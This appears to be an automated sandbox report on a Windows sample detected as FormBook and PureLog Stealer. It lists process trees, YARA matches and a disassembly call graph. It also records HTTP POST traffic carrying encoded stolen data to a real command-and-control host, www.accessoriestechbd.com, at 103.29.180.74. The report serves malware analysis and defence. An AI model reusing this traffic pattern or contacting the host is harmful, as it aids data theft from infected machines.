                                              Data Raw: 62 50 44 3d 4a 68 58 6b 77 6d 32 64 6d 44 73 41 71 6e 7a 4e 50 41 6a 68 70 41 43 41 58 74 2b 61 75 4b 45 4c 32 79 33 4e 73 67 42 47 2f 6b 44 63 63 4d 6b 6a 47 34 35 4d 6d 43 70 54 38 63 38 2f 2f 56 45 4e 69 2f 61 58 6d 77 6e 55 6d 35 38 47 66 46 31 45 39 41 43 59 61 71 31 61 77 2f 46 53 72 56 6c 6f 63 31 35 45 67 7a 66 6e 61 2f 75 51 41 63 2f 2b 61 61 71 6d 4e 42 4d 65 69 30 6a 76 65 45 47 32 34 2f 54 36 79 48 66 77 51 6e 6f 36 64 30 32 67 54 65 78 30 78 4e 6d 2f 76 77 6a 39 36 6e 78 79 6a 35 2f 79 55 38 77 70 47 65 6e 62 6c 2f 51 59 70 66 6c 58 66 47 58 65 79 47 44 54 30 75 4f 59 58 51 3d 3d
                                              Data Ascii: bPD=JhXkwm2dmDsAqnzNPAjhpACAXt+auKEL2y3NsgBG/kDccMkjG45MmCpT8c8//VENi/aXmwnUm58GfF1E9ACYaq1aw/FSrVloc15Egzfna/uQAc/+aaqmNBMei0jveEG24/T6yHfwQno6d02gTex0xNm/vwj96nxyj5/yU8wpGenbl/QYpflXfGXeyGDT0uOYXQ==
                                              Jul 26, 2024 13:58:16.188232899 CEST926INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 708
                                              date: Fri, 26 Jul 2024 11:58:15 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.449765103.29.180.74805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:58:17.713274002 CEST732OUTPOST /5pdf/ HTTP/1.1
                                              Host: www.accessoriestechbd.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.accessoriestechbd.com
                                              Referer: http://www.accessoriestechbd.com/5pdf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 4a 68 58 6b 77 6d 32 64 6d 44 73 41 34 57 44 4e 4f 6e 2f 68 68 41 43 50 61 39 2b 61 6c 71 45 48 32 79 37 4e 73 69 74 73 2f 58 33 63 63 70 59 6a 55 74 4e 4d 6c 43 70 54 30 38 38 6a 77 31 45 47 69 2f 57 31 6d 79 7a 55 6d 35 6f 47 66 45 46 45 38 33 32 62 62 36 31 59 72 50 46 4d 76 56 6c 6f 63 31 35 45 67 7a 4c 64 61 2f 6d 51 41 73 50 2b 5a 37 71 68 45 68 4d 42 6c 30 6a 76 56 6b 47 79 34 2f 54 55 79 45 62 61 51 6c 51 36 64 32 75 67 54 4b 6c 33 37 4e 6d 6d 78 77 69 55 30 6c 45 71 6a 62 43 2f 61 65 63 37 4a 76 6e 41 6b 35 42 43 34 75 45 41 4e 47 7a 74 76 42 4b 6e 35 74 7a 52 4d 58 6e 65 6f 61 61 4d 47 42 72 50 62 4c 58 51 4b 75 4f 7a 6b 79 63 3d
                                              Data Ascii: bPD=JhXkwm2dmDsA4WDNOn/hhACPa9+alqEH2y7Nsits/X3ccpYjUtNMlCpT088jw1EGi/W1myzUm5oGfEFE832bb61YrPFMvVloc15EgzLda/mQAsP+Z7qhEhMBl0jvVkGy4/TUyEbaQlQ6d2ugTKl37NmmxwiU0lEqjbC/aec7JvnAk5BC4uEANGztvBKn5tzRMXneoaaMGBrPbLXQKuOzkyc=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.449766103.29.180.74805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:58:20.286775112 CEST10814OUTPOST /5pdf/ HTTP/1.1
                                              Host: www.accessoriestechbd.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.accessoriestechbd.com
                                              Referer: http://www.accessoriestechbd.com/5pdf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 4a 68 58 6b 77 6d 32 64 6d 44 73 41 34 57 44 4e 4f 6e 2f 68 68 41 43 50 61 39 2b 61 6c 71 45 48 32 79 37 4e 73 69 74 73 2f 58 76 63 63 62 67 6a 47 61 68 4d 6b 43 70 54 36 63 38 67 77 31 45 68 69 2b 2b 78 6d 79 2f 45 6d 36 51 47 64 6e 64 45 70 32 32 62 4f 71 31 59 30 2f 46 4e 72 56 6c 39 63 78 56 41 67 7a 62 64 61 2f 6d 51 41 75 58 2b 50 61 71 68 47 68 4d 65 69 30 69 67 65 45 48 6e 34 37 32 70 79 46 76 67 52 56 77 36 64 57 2b 67 52 35 4e 33 33 4e 6d 7a 6c 51 69 4d 30 6c 59 4c 6a 62 4f 5a 61 61 63 56 4a 76 54 41 6b 4d 38 34 38 65 63 39 65 68 66 76 73 77 65 77 38 76 4b 64 49 47 6a 39 68 59 71 76 53 67 4c 35 57 38 71 68 50 2b 71 6e 78 33 44 6f 63 77 4e 53 78 66 69 59 4e 43 67 46 34 67 64 63 45 35 39 4f 34 75 59 37 4d 59 4a 32 71 49 45 75 33 70 38 32 6c 6f 39 70 31 43 47 39 36 52 2b 4a 49 6e 4a 6c 4b 7a 5a 5a 6c 6a 31 78 2f 71 7a 77 42 4b 74 6f 47 69 65 4f 35 6b 73 2f 6d 61 68 62 52 39 69 5a 6d 65 47 39 56 34 52 37 79 6c 33 59 58 72 4c 34 48 4f 73 61 5a 39 78 33 4d 31 56 57 54 31 33 37 4e 49 [TRUNCATED]
                                              Data Ascii: bPD=JhXkwm2dmDsA4WDNOn/hhACPa9+alqEH2y7Nsits/XvccbgjGahMkCpT6c8gw1Ehi++xmy/Em6QGdndEp22bOq1Y0/FNrVl9cxVAgzbda/mQAuX+PaqhGhMei0igeEHn472pyFvgRVw6dW+gR5N33NmzlQiM0lYLjbOZaacVJvTAkM848ec9ehfvswew8vKdIGj9hYqvSgL5W8qhP+qnx3DocwNSxfiYNCgF4gdcE59O4uY7MYJ2qIEu3p82lo9p1CG96R+JInJlKzZZlj1x/qzwBKtoGieO5ks/mahbR9iZmeG9V4R7yl3YXrL4HOsaZ9x3M1VWT137NI3JKdIS3/DOr3OZNXNfkpWUOigKyJHg5tgkYx/DNsDQO13WnzRii5djJk+QiN0a4ONSrObkgrygxz9u8gL6PKwDMHnDDmN6Yd5+DczuROur5H1PlZQXF0SowzRSDM08X7nNZbF70EJ+b8xozwPssglDh7Eiw7iK6em0CBK7xOSX96nvk1e+q2x4cN7EcD7iVv/GUSlaqntD7iaAA5nmRE0OEdI/XG3L78jK719CKyoYO7Tvxj9nBJAbKjab9foNP67DaxqNX+uiSUETsbLQpO23ENnLqqzrSZusr7zN9I9ZyrHZnAtLkjay9E2CqO2Ayo1VElqF5KxerYugJA71OSd4dWb0+gz6s7/J5O1mt1R0JVWRiDcIXeK2KZkdtX/J6H0fpkBRF3mkrll8J/dJildabnHDVoax3bd6w4lyrgZCnBY5VtYSfKk0vE/QITfsNEGyYnoXUH4Yl4s9guZZRzdMKccxxFgOaqVsVNb7imd2FKfZ8l/VK7wQ8ggkAkc4gn2fNG8HhynIyceLPtJOI1Q9rIk1QwwW7w2vf4pOU1SEfyOGsnxUVulh++4Cxpvg3qPByhG0UW99iB1EH4hbBK+NpEYc0XnPs1WEmrW1XQeqvB8uy+4BJOhh9Xu+qbVKjXeDWUZomloSIb4fB9dWDGf07ga65wveRFza [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24192.168.2.449767103.29.180.7480
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:58:23.270807028 CEST438OUTGET /5pdf/?r4HtI=inDHeTS0D6JHi&bPD=Ej/EzQPepC1y7H/CB3fFjxmxT5K/uokQyhXQpBVK3nqnb8oYKZIShVAN8OJA1iYy8omWkznWlYUMQWoQrGGIZe4YpIxUtk1QZkVuvgrHNfuUWu/hH7rCDC0= HTTP/1.1
                                              Host: www.accessoriestechbd.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:58:27.994468927 CEST926INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 708
                                              date: Fri, 26 Jul 2024 11:58:27 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:07:55:16
                                              Start date:26/07/2024
                                              Path:C:\Users\user\Desktop\dGHiTqj3AB.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\dGHiTqj3AB.exe"
                                              Imagebase:0x910000
                                              File size:951'296 bytes
                                              MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1757860800.00000000072B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:07:55:27
                                              Start date:26/07/2024
                                              Path:C:\Users\user\Desktop\dGHiTqj3AB.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\dGHiTqj3AB.exe"
                                              Imagebase:0x310000
                                              File size:951'296 bytes
                                              MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:07:55:27
                                              Start date:26/07/2024
                                              Path:C:\Users\user\Desktop\dGHiTqj3AB.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\dGHiTqj3AB.exe"
                                              Imagebase:0xc80000
                                              File size:951'296 bytes
                                              MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:07:56:11
                                              Start date:26/07/2024
                                              Path:C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe"
                                              Imagebase:0x920000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:8
                                              Start time:07:56:12
                                              Start date:26/07/2024
                                              Path:C:\Windows\SysWOW64\mcbuilder.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\mcbuilder.exe"
                                              Imagebase:0x510000
                                              File size:80'896 bytes
                                              MD5 hash:CAE8E531CD82401A9ECB4C446CBB964B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:9
                                              Start time:07:56:39
                                              Start date:26/07/2024
                                              Path:C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe"
                                              Imagebase:0x920000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:11
                                              Start time:07:56:55
                                              Start date:26/07/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff6bf500000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:3%
                                                Total number of Nodes:331
                                                Total number of Limit Nodes:5
                                                execution_graph 36389 fdd01c 36390 fdd034 36389->36390 36391 fdd08e 36390->36391 36396 5331a97 36390->36396 36401 5331aa8 36390->36401 36406 5332808 36390->36406 36411 5332818 36390->36411 36397 5331aa8 36396->36397 36399 5332818 2 API calls 36397->36399 36400 5332808 2 API calls 36397->36400 36398 5331aef 36398->36391 36399->36398 36400->36398 36402 5331ace 36401->36402 36404 5332818 2 API calls 36402->36404 36405 5332808 2 API calls 36402->36405 36403 5331aef 36403->36391 36404->36403 36405->36403 36407 5332818 36406->36407 36408 5332877 36407->36408 36416 53329a0 36407->36416 36421 5332990 36407->36421 36412 5332845 36411->36412 36413 5332877 36412->36413 36414 53329a0 2 API calls 36412->36414 36415 5332990 2 API calls 36412->36415 36414->36413 36415->36413 36418 53329b4 36416->36418 36417 5332a40 36417->36408 36426 5332a58 36418->36426 36429 5332a48 36418->36429 36423 53329a0 36421->36423 36422 5332a40 36422->36408 36424 5332a58 2 API calls 36423->36424 36425 5332a48 2 API calls 36423->36425 36424->36422 36425->36422 36427 5332a69 36426->36427 36433 5334013 36426->36433 36427->36417 36430 5332a58 36429->36430 36431 5332a69 36430->36431 36432 5334013 2 API calls 36430->36432 36431->36417 36432->36431 36437 5334030 36433->36437 36441 5334040 36433->36441 36434 533402a 36434->36427 36438 5334040 36437->36438 36439 5334089 36438->36439 36440 53340da CallWindowProcW 36438->36440 36439->36434 36440->36439 36442 5334082 36441->36442 36444 5334089 36441->36444 36443 53340da CallWindowProcW 36442->36443 36442->36444 36443->36444 36444->36434 36233 102d040 36234 102d086 36233->36234 36238 102d618 36234->36238 36241 102d628 36234->36241 36235 102d173 36244 102d27c 36238->36244 36242 102d656 36241->36242 36243 102d27c DuplicateHandle 36241->36243 36242->36235 36243->36242 36245 102d690 DuplicateHandle 36244->36245 36246 102d656 36245->36246 36246->36235 36247 5337170 36248 533719d 36247->36248 36259 5336d70 36248->36259 36250 53371e2 36251 5336d70 4 API calls 36250->36251 36252 5337214 36251->36252 36264 5336d80 36252->36264 36255 5336d80 4 API calls 36256 53372b9 36255->36256 36257 5336d70 4 API calls 36256->36257 36258 53373e5 36257->36258 36260 5336d7b 36259->36260 36268 1025cc4 36260->36268 36275 1028308 36260->36275 36261 5338e1b 36261->36250 36265 5336d8b 36264->36265 36380 5336f6c 36265->36380 36267 5337246 36267->36255 36269 1025ccf 36268->36269 36271 10285cb 36269->36271 36282 102ac78 36269->36282 36270 1028609 36270->36261 36271->36270 36286 102cd78 36271->36286 36291 102cd77 36271->36291 36276 102830b 36275->36276 36278 10285cb 36276->36278 36279 102ac78 2 API calls 36276->36279 36277 1028609 36277->36261 36278->36277 36280 102cd77 4 API calls 36278->36280 36281 102cd78 4 API calls 36278->36281 36279->36278 36280->36277 36281->36277 36296 102aca0 36282->36296 36300 102acb0 36282->36300 36283 102ac8e 36283->36271 36287 102cd99 36286->36287 36288 102cdbd 36287->36288 36323 102cf18 36287->36323 36327 102cf28 36287->36327 36288->36270 36292 102cd99 36291->36292 36293 102cdbd 36292->36293 36294 102cf18 4 API calls 36292->36294 36295 102cf28 4 API calls 36292->36295 36293->36270 36294->36293 36295->36293 36297 102acb0 36296->36297 36303 102ada8 36297->36303 36298 102acbf 36298->36283 36302 102ada8 2 API calls 36300->36302 36301 102acbf 36301->36283 36302->36301 36304 102adb9 36303->36304 36305 102addc 36303->36305 36304->36305 36311 102b030 36304->36311 36315 102b040 36304->36315 36305->36298 36306 102add4 36306->36305 36307 102afe0 GetModuleHandleW 36306->36307 36308 102b00d 36307->36308 36308->36298 36312 102b040 36311->36312 36313 102b079 36312->36313 36319 102a130 36312->36319 36313->36306 36316 102b054 36315->36316 36317 102a130 LoadLibraryExW 36316->36317 36318 102b079 36316->36318 36317->36318 36318->36306 36320 102b220 LoadLibraryExW 36319->36320 36322 102b299 36320->36322 36322->36313 36324 102cf35 36323->36324 36325 102cf6f 36324->36325 36331 102bae0 36324->36331 36325->36288 36328 102cf35 36327->36328 36329 102cf6f 36328->36329 36330 102bae0 4 API calls 36328->36330 36329->36288 36330->36329 36332 102baeb 36331->36332 36333 102dc88 36332->36333 36335 102d2dc 36332->36335 36336 102d2e7 36335->36336 36337 1025cc4 4 API calls 36336->36337 36338 102dcf7 36337->36338 36342 102fa88 36338->36342 36348 102fa70 36338->36348 36339 102dd31 36339->36333 36344 102fab9 36342->36344 36345 102fbb9 36342->36345 36343 102fac5 36343->36339 36344->36343 36353 53309b2 36344->36353 36358 53309c0 36344->36358 36345->36339 36349 102fa88 36348->36349 36350 102fac5 36349->36350 36351 53309b2 2 API calls 36349->36351 36352 53309c0 2 API calls 36349->36352 36350->36339 36351->36350 36352->36350 36354 53309c0 36353->36354 36355 5330a9a 36354->36355 36363 53318a0 36354->36363 36367 5331890 36354->36367 36359 53309eb 36358->36359 36360 5330a9a 36359->36360 36361 53318a0 2 API calls 36359->36361 36362 5331890 2 API calls 36359->36362 36361->36360 36362->36360 36372 53318f0 36363->36372 36376 53318e4 36363->36376 36368 53318a0 36367->36368 36370 53318f0 CreateWindowExW 36368->36370 36371 53318e4 CreateWindowExW 36368->36371 36369 53318d5 36369->36355 36370->36369 36371->36369 36373 5331958 CreateWindowExW 36372->36373 36375 5331a14 36373->36375 36375->36375 36377 53318f0 CreateWindowExW 36376->36377 36379 5331a14 36377->36379 36379->36379 36381 5336f77 36380->36381 36382 5339cc2 36381->36382 36383 1025cc4 4 API calls 36381->36383 36384 1028308 4 API calls 36381->36384 36382->36267 36383->36382 36384->36382 36385 5339c7b 36386 5339c80 36385->36386 36387 5336f6c 4 API calls 36386->36387 36388 5339c8f 36387->36388 36445 1024668 36446 102467a 36445->36446 36449 1024686 36446->36449 36451 1024778 36446->36451 36448 10246a5 36456 1023e34 36449->36456 36452 102479d 36451->36452 36460 1024888 36452->36460 36464 1024879 36452->36464 36457 1023e3f 36456->36457 36472 1025c44 36457->36472 36459 1027048 36459->36448 36462 10248af 36460->36462 36461 102498c 36461->36461 36462->36461 36468 10244b4 36462->36468 36466 1024888 36464->36466 36465 102498c 36465->36465 36466->36465 36467 10244b4 CreateActCtxA 36466->36467 36467->36465 36469 1025918 CreateActCtxA 36468->36469 36471 10259db 36469->36471 36473 1025c4f 36472->36473 36476 1025c64 36473->36476 36475 10270ed 36475->36459 36477 1025c6f 36476->36477 36480 1025c94 36477->36480 36479 10271c2 36479->36475 36481 1025c9f 36480->36481 36482 1025cc4 4 API calls 36481->36482 36483 10272c5 36482->36483 36483->36479 36484 755def8 36485 755e083 36484->36485 36486 755df1e 36484->36486 36486->36485 36488 755a558 36486->36488 36489 755e580 PostMessageW 36488->36489 36491 755e5ec 36489->36491 36491->36486 36492 755c328 36493 755c332 36492->36493 36494 755c38a 36492->36494 36497 755cc38 36493->36497 36516 755cc48 36493->36516 36498 755cc3c 36497->36498 36499 755cc86 36498->36499 36535 755d86d 36498->36535 36539 755daed 36498->36539 36543 755d1a0 36498->36543 36548 755d3e1 36498->36548 36553 755d484 36498->36553 36558 755d23e 36498->36558 36563 755d71f 36498->36563 36568 755d17c 36498->36568 36573 755d11c 36498->36573 36581 755d1dd 36498->36581 36588 755d472 36498->36588 36593 755d417 36498->36593 36598 755d7b5 36498->36598 36602 755d44a 36498->36602 36607 755d60b 36498->36607 36611 755d50f 36498->36611 36499->36494 36517 755cc4b 36516->36517 36518 755d7b5 2 API calls 36517->36518 36519 755cc86 36517->36519 36520 755d417 2 API calls 36517->36520 36521 755d472 2 API calls 36517->36521 36522 755d1dd 4 API calls 36517->36522 36523 755d11c 4 API calls 36517->36523 36524 755d17c 2 API calls 36517->36524 36525 755d71f 2 API calls 36517->36525 36526 755d23e 2 API calls 36517->36526 36527 755d484 2 API calls 36517->36527 36528 755d3e1 2 API calls 36517->36528 36529 755d1a0 2 API calls 36517->36529 36530 755daed 2 API calls 36517->36530 36531 755d86d 2 API calls 36517->36531 36532 755d50f 2 API calls 36517->36532 36533 755d60b 2 API calls 36517->36533 36534 755d44a 2 API calls 36517->36534 36518->36519 36519->36494 36520->36519 36521->36519 36522->36519 36523->36519 36524->36519 36525->36519 36526->36519 36527->36519 36528->36519 36529->36519 36530->36519 36531->36519 36532->36519 36533->36519 36534->36519 36536 755d965 